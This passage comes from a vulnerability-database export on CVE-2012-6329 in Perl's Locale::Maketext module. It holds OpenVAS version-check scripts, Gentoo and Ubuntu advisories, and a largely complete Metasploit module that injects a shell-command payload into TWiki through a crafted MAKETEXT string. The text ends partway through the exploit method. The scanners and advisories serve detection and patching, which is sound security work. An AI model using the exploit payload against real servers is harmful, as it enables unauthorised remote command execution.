script_tag(name:\"last_modification\", value:\"2020-04-21 11:03:03 +0000 (Tue, 21 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2013-01-24 12:42:04 +0530 (Thu, 24 Jan 2013)\");\n script_name(\"Strawberry Perl Locale::Maketext Module Multiple Code Injection Vulnerabilities (Windows)\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/51498\");\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/80566\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2013 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_perl_detect_win.nasl\");\n script_mandatory_keys(\"Strawberry/Perl/Ver\");\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers to execute arbitrary code on\n the system.\");\n script_tag(name:\"affected\", value:\"Strawberry Perl version prior to 5.17.7 on Windows\");\n script_tag(name:\"insight\", value:\"An improper validation of input by the '_compile()' function which can be\n exploited to inject and execute arbitrary Perl code on the system.\");\n script_tag(name:\"solution\", value:\"Upgrade to Strawberry Perl version 5.17.7 or later.\");\n script_tag(name:\"summary\", value:\"The host is installed with Strawberry Perl and is prone to multiple code\n injection vulnerabilities.\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"http://strawberryperl.com\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\nspVer = get_kb_item(\"Strawberry/Perl/Ver\");\nif(spVer)\n{\n if(version_is_less(version:spVer, test_version:\"5.17.7\"))\n {\n report = report_fixed_ver(installed_version:spVer, fixed_version:\"5.17.7\");\n security_message(port: 0, data: report);\n exit(0);\n }\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2018-01-24T11:10:10", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-6329"], "description": "Check for the Version of perl", "modified": "2018-01-24T00:00:00", "published": "2013-01-31T00:00:00", "id": "OPENVAS:865275", "href": "http://plugins.openvas.org/nasl.php?oid=865275", "type": "openvas", "title": "Fedora Update for perl FEDORA-2013-0659", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for perl FEDORA-2013-0659\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Perl is a high-level programming language with roots in C, sed, awk and shell\n scripting. Perl is good at handling processes and files, and is especially\n good at handling text. Perl's hallmarks are practicality and efficiency.\n While it is used to do a lot of different things, Perl's most common\n applications are system administration utilities and web programming. A large\n proportion of the CGI scripts on the web are written in Perl. You need the\n perl package installed on your system so that your system can handle Perl\n scripts.\n\n Install this package if you want to program in Perl or enable your system to\n handle Perl scripts.\";\n\n\ntag_solution = \"Please Install the Updated Packages.\";\ntag_affected = \"perl on Fedora 18\";\n\n\n\n\nif(description)\n{\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2013-January/097811.html\");\n script_id(865275);\n script_version(\"$Revision: 8509 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-24 07:57:46 +0100 (Wed, 24 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-01-31 09:25:13 +0530 (Thu, 31 Jan 2013)\");\n script_cve_id(\"CVE-2012-6329\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"FEDORA\", value: \"2013-0659\");\n script_name(\"Fedora Update for perl FEDORA-2013-0659\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of perl\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC18\")\n{\n\n if ((res = isrpmvuln(pkg:\"perl\", rpm:\"perl~5.16.2~237.fc18\", rls:\"FC18\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-02-06T13:09:40", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-6329"], "description": "Check for the Version of perl", "modified": "2018-02-05T00:00:00", "published": "2013-02-22T00:00:00", "id": "OPENVAS:865373", "href": "http://plugins.openvas.org/nasl.php?oid=865373", "type": "openvas", "title": "Fedora Update for perl FEDORA-2013-1836", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for perl FEDORA-2013-1836\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Perl is a high-level programming language with roots in C, sed, awk and shell\n scripting. Perl is good at handling processes and files, and is especially\n good at handling text. Perl's hallmarks are practicality and efficiency.\n While it is used to do a lot of different things, Perl's most common\n applications are system administration utilities and web programming. A large\n proportion of the CGI scripts on the web are written in Perl. You need the\n perl package installed on your system so that your system can handle Perl\n scripts.\n\n Install this package if you want to program in Perl or enable your system to\n handle Perl scripts.\";\n\n\ntag_affected = \"perl on Fedora 17\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2013-February/098991.html\");\n script_id(865373);\n script_version(\"$Revision: 8672 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-02-05 17:39:18 +0100 (Mon, 05 Feb 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-02-22 09:59:33 +0530 (Fri, 22 Feb 2013)\");\n script_cve_id(\"CVE-2012-6329\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"FEDORA\", value: \"2013-1836\");\n script_name(\"Fedora Update for perl FEDORA-2013-1836\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of perl\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"perl\", rpm:\"perl~5.14.3~221.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2020-04-23T19:06:10", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-6329"], "description": "The host is installed with Active Perl and is prone to multiple\n code injection vulnerabilities.", "modified": "2020-04-21T00:00:00", "published": "2013-01-24T00:00:00", "id": "OPENVAS:1361412562310803339", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310803339", "type": "openvas", "title": "Active Perl Locale::Maketext Module Multiple Code Injection Vulnerabilities (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Active Perl Locale::Maketext Module Multiple Code Injection Vulnerabilities (Windows)\n#\n# Authors:\n# Arun kallavi <karun@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers to execute arbitrary code on\n the system.\");\n script_tag(name:\"affected\", value:\"Active Perl version prior to 5.17.7 on Windows\");\n script_tag(name:\"insight\", value:\"An improper validation of input by the '_compile()' function which can be\n exploited to inject and execute arbitrary Perl code on the system.\");\n script_tag(name:\"solution\", value:\"Upgrade to Active Perl version 5.17.7 or later.\");\n script_tag(name:\"summary\", value:\"The host is installed with Active Perl and is prone to multiple\n code injection vulnerabilities.\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.803339\");\n script_version(\"2020-04-21T11:03:03+0000\");\n script_cve_id(\"CVE-2012-6329\");\n script_bugtraq_id(56852);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-04-21 11:03:03 +0000 (Tue, 21 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2013-01-24 12:42:04 +0530 (Thu, 24 Jan 2013)\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_name(\"Active Perl Locale::Maketext Module Multiple Code Injection Vulnerabilities (Windows)\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/51498\");\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/80566\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2013 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_perl_detect_win.nasl\");\n script_mandatory_keys(\"ActivePerl/Ver\");\n script_xref(name:\"URL\", value:\"http://www.perl.org/get.html\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\n\napVer = get_kb_item(\"ActivePerl/Ver\");\nif(apVer)\n{\n if(version_is_less(version:apVer, test_version:\"5.17.7\"))\n {\n report = report_fixed_ver(installed_version:apVer, fixed_version:\"5.17.7\");\n security_message(port: 0, data: report);\n exit(0);\n }\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-07-02T21:11:03", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-6329"], "description": "The host is installed with Strawberry Perl and is prone to multiple code\n injection vulnerabilities.", "modified": "2017-05-05T00:00:00", "published": "2013-01-24T00:00:00", "id": "OPENVAS:803162", "href": "http://plugins.openvas.org/nasl.php?oid=803162", "type": "openvas", "title": "Strawberry Perl Locale::Maketext Module Multiple Code Injection Vulnerabilities (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_perl_maketext_mult_code_inje_vuln_win.nasl 6074 2017-05-05 09:03:14Z teissa $\n#\n# Strawberry Perl Locale::Maketext Module Multiple Code Injection Vulnerabilities (Windows)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation will allow attackers to execute arbitrary code on\n the system.\n Impact Level: System/Application\";\n\ntag_affected = \"Strawberry Perl version prior to 5.17.7 on Windows\";\ntag_insight = \"An improper validation of input by the '_compile()' function which can be\n exploited to inject and execute arbitrary Perl code on the system.\";\ntag_solution = \"Upgrade to Strawberry Perl version 5.17.7 or later,\n For updates refer to http://strawberryperl.com\";\ntag_summary = \"The host is installed with Strawberry Perl and is prone to multiple code\n injection vulnerabilities.\";\n\nif(description)\n{\n script_id(803162);\n script_version(\"$Revision: 6074 $\");\n script_cve_id(\"CVE-2012-6329\");\n script_bugtraq_id(56852);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-05-05 11:03:14 +0200 (Fri, 05 May 2017) $\");\n script_tag(name:\"creation_date\", value:\"2013-01-24 12:42:04 +0530 (Thu, 24 Jan 2013)\");\n script_name(\"Strawberry Perl Locale::Maketext Module Multiple Code Injection Vulnerabilities (Windows)\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/51498\");\n script_xref(name : \"URL\" , value : \"http://xforce.iss.net/xforce/xfdb/80566\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_perl_detect_win.nasl\");\n script_mandatory_keys(\"Strawberry/Perl/Ver\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\n## Variable Initialization\nspVer = \"\";\n\n## Get version from KB\nspVer = get_kb_item(\"Strawberry/Perl/Ver\");\nif(spVer)\n{\n if(version_is_less(version:spVer, test_version:\"5.17.7\"))\n {\n security_message(0);\n exit(0);\n }\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:37:19", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-6329"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2014-02-11T00:00:00", "id": "OPENVAS:1361412562310841704", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310841704", "type": "openvas", "title": "Ubuntu Update for perl USN-2099-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_2099_1.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for perl USN-2099-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.841704\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-02-11 10:44:48 +0530 (Tue, 11 Feb 2014)\");\n script_cve_id(\"CVE-2012-6329\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Ubuntu Update for perl USN-2099-1\");\n\n script_tag(name:\"affected\", value:\"perl on Ubuntu 12.10,\n Ubuntu 12.04 LTS,\n Ubuntu 10.04 LTS\");\n script_tag(name:\"insight\", value:\"It was discovered that Perl's Locale::Maketext module\nincorrectly handled backslashes and fully qualified method names. An attacker\ncould possibly use this flaw to execute arbitrary code when an application used\nuntrusted templates.\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"USN\", value:\"2099-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2099-1/\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'perl'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(12\\.04 LTS|10\\.04 LTS|12\\.10)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"perl-modules\", ver:\"5.14.2-6ubuntu2.4\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU10.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"perl-modules\", ver:\"5.10.1-8ubuntu2.4\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU12.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"perl-modules\", ver:\"5.14.2-13ubuntu0.3\", rls:\"UBUNTU12.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:43", "bulletinFamily": "unix", "cvelist": ["CVE-2012-6329"], "edition": 1, "description": "### Background\n\nLocale-Maketext - Perl framework for localization\n\n### Description\n\nTwo vulnerabilities have been reported in the Locale-Maketext module for Perl, which can be exploited by malicious users to compromise an application using the module. \n\nThe vulnerabilities are caused due to the \u201c_compile()\u201d function not properly sanitising input, which can be exploited to inject and execute arbitrary Perl code. \n\n### Impact\n\nA remote attacker could possibly execute arbitrary code with the privileges of the process, or cause a Denial of Service condition. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll users of the Locale-Maketext module should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose\n \">=perl-core/Locale-Maketext-1.230.0\"", "modified": "2014-12-29T00:00:00", "published": "2014-10-12T00:00:00", "id": "GLSA-201410-02", "href": "https://security.gentoo.org/glsa/201410-02", "type": "gentoo", "title": "Perl, Perl Locale-Maketext module: Multiple vulnerabilities", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "ubuntu": [{"lastseen": "2020-07-02T11:37:10", "bulletinFamily": "unix", "cvelist": ["CVE-2012-6329"], "description": "It was discovered that Perl's Locale::Maketext module incorrectly handled \nbackslashes and fully qualified method names. An attacker could possibly \nuse this flaw to execute arbitrary code when an application used untrusted \ntemplates.", "edition": 5, "modified": "2014-02-05T00:00:00", "published": "2014-02-05T00:00:00", "id": "USN-2099-1", "href": "https://ubuntu.com/security/notices/USN-2099-1", "title": "Perl vulnerability", "type": "ubuntu", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-02-02T21:18:49", "description": "TWiki MAKETEXT Remote Command Execution. CVE-2012-6329. Remote exploit for unix platform", "published": "2012-12-23T00:00:00", "type": "exploitdb", "title": "TWiki MAKETEXT Remote Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-6329"], "modified": "2012-12-23T00:00:00", "id": "EDB-ID:23579", "href": "https://www.exploit-db.com/exploits/23579/", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = ExcellentRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpClient\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'TWiki MAKETEXT Remote Command Execution',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a vulnerability in the MAKETEXT Twiki variable. By using a\r\n\t\t\t\tspecially crafted MAKETEXT, a malicious user can execute shell commands since user\r\n\t\t\t\tinput is passed to the Perl \"eval\" command without first being sanitized. The\r\n\t\t\t\tproblem is caused by an underlying security issue in the CPAN:Locale::Maketext\r\n\t\t\t\tmodule. This works in TWiki sites that have user interface localization enabled\r\n\t\t\t\t(UserInterfaceInternationalisation variable set).\r\n\r\n\t\t\t\tIf USERNAME and PASSWORD aren't provided, anonymous access will be tried. Also,\r\n\t\t\t\tif the 'TwikiPage' option isn't provided, the module will try to create a random\r\n\t\t\t\tpage on the SandBox space. The modules has been tested successfully on\r\n\t\t\t\tTWiki 5.1.2 as distributed with the official TWiki-VM-5.1.2-1 virtual machine.\r\n\t\t\t},\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'George Clark', # original discovery\r\n\t\t\t\t\t'juan vazquez' # Metasploit module\r\n\t\t\t\t],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2012-6329' ],\r\n\t\t\t\t\t[ 'OSVDB', '88460' ],\r\n\t\t\t\t\t[ 'BID', '56950' ],\r\n\t\t\t\t\t[ 'URL', 'http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2012-6329' ]\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false, # web server context\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'DisableNops' => true,\r\n\t\t\t\t\t'Space' => 1024,\r\n\t\t\t\t\t'Compat' =>\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'PayloadType' => 'cmd',\r\n\t\t\t\t\t\t\t'RequiredCmd' => 'generic ruby python bash telnet'\r\n\t\t\t\t\t\t}\r\n\t\t\t\t},\r\n\t\t\t'Platform' => [ 'unix' ],\r\n\t\t\t'Arch' => ARCH_CMD,\r\n\t\t\t'Targets' => [[ 'Automatic', { }]],\r\n\t\t\t'DisclosureDate' => 'Dec 15 2012',\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOptString.new('TARGETURI', [ true, \"TWiki base path\", \"/\" ]),\r\n\t\t\t\tOptString.new('TwikiPage', [ false, \"TWiki Page with edit permissions to inject the payload, by default random Page on Sandbox (Ex: /Sandbox/MsfTest)\" ]),\r\n\t\t\t\tOptString.new('USERNAME', [ false, \"The user to authenticate as (anonymous if username not provided)\"]),\r\n\t\t\t\tOptString.new('PASSWORD', [ false, \"The password to authenticate with (anonymous if password not provided)\" ])\r\n\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef do_login(username, password)\r\n\t\tres = send_request_cgi({\r\n\t\t\t'method' => 'POST',\r\n\t\t\t'uri' => \"#{@base}do/login\",\r\n\t\t\t'vars_post' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'username' => username,\r\n\t\t\t\t\t'password' => password\r\n\t\t\t\t}\r\n\t\t\t})\r\n\r\n\t\tif not res or res.code != 302 or res.headers['Set-Cookie'] !~ /TWIKISID=([0-9a-f]*)/\r\n\t\t\treturn nil\r\n\t\tend\r\n\r\n\t\tsession = $1\r\n\t\treturn session\r\n\tend\r\n\r\n\tdef inject_code(session, code)\r\n\r\n\t\tvprint_status(\"Retrieving the crypttoken...\")\r\n\r\n\t\tres = send_request_cgi({\r\n\t\t\t'uri' => \"#{@base}do/edit#{@page}\",\r\n\t\t\t'cookie' => \"TWIKISID=#{session}\",\r\n\t\t\t'vars_get' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'nowysiwyg' => '1'\r\n\t\t\t\t}\r\n\t\t})\r\n\r\n\t\tif not res or res.code != 200 or res.body !~ /name=\"crypttoken\" value=\"([0-9a-f]*)\"/\r\n\t\t\tvprint_error(\"Error retrieving the crypttoken\")\r\n\t\t\treturn nil\r\n\t\tend\r\n\r\n\t\tcrypttoken = $1\r\n\t\tvprint_good(\"crypttoken found: #{crypttoken}\")\r\n\r\n\t\tif session.empty?\r\n\t\t\tif res.headers['Set-Cookie'] =~ /TWIKISID=([0-9a-f]*)/\r\n\t\t\t\tsession = $1\r\n\t\t\telse\r\n\t\t\t\tvprint_error(\"Error using anonymous access\")\r\n\t\t\t\treturn nil\r\n\t\t\tend\r\n\t\tend\r\n\r\n\t\tvprint_status(\"Injecting the payload...\")\r\n\r\n\t\tres = send_request_cgi({\r\n\t\t\t'method' => 'POST',\r\n\t\t\t'uri' => \"#{@base}do/save#{@page}\",\r\n\t\t\t'cookie' => \"TWIKISID=#{session}\",\r\n\t\t\t'vars_post' =>\r\n\t\t\t{\r\n\t\t\t\t'crypttoken' => crypttoken,\r\n\t\t\t\t'text' => \"#{rand_text_alpha(3 + rand(3))} %MAKETEXT{\\\"#{rand_text_alpha(3 + rand(3))} [_1] #{rand_text_alpha(3 + rand(3))}\\\\\\\\'}; `#{code}`; { #\\\" args=\\\"#{rand_text_alpha(3 + rand(3))}\\\"}%\"\r\n\t\t\t}\r\n\t\t})\r\n\r\n\t\tif not res or res.code != 302 or res.headers['Location'] =~ /oops/ or res.headers['Location'] !~ /#{@page}/\r\n\t\t\tprint_warning(\"Error injecting the payload\")\r\n\t\t\tprint_status \"#{res.code}\\n#{res.body}\\n#{res.headers['Location']}\"\r\n\t\t\treturn nil\r\n\t\tend\r\n\r\n\t\tlocation = URI(res.headers['Location']).path\r\n\t\tprint_good(\"Payload injected on #{location}\")\r\n\r\n\t\treturn location\r\n\tend\r\n\r\n\tdef check\r\n\t\t@base = target_uri.path\r\n\t\t@base << '/' if @base[-1, 1] != '/'\r\n\r\n\t\tres = send_request_cgi({\r\n\t\t\t'uri' => \"#{@base}do/view/TWiki/WebHome\"\r\n\t\t})\r\n\r\n\t\tif not res or res.code != 200\r\n\t\t\treturn Exploit::CheckCode::Unknown\r\n\t\tend\r\n\r\n\t\tif res.body =~ /This site is running TWiki version.*TWiki-(\\d\\.\\d\\.\\d)/\r\n\t\t\tversion = $1\r\n\t\t\tprint_status(\"Version found: #{version}\")\r\n\t\t\tif version < \"5.1.3\"\r\n\t\t\t\treturn Exploit::CheckCode::Appears\r\n\t\t\telse\r\n\t\t\t\treturn Exploit::CheckCode::Safe\r\n\t\t\tend\r\n\t\tend\r\n\r\n\t\treturn Exploit::CheckCode::Detected\r\n\tend\r\n\r\n\r\n\tdef exploit\r\n\r\n\t\t# Init 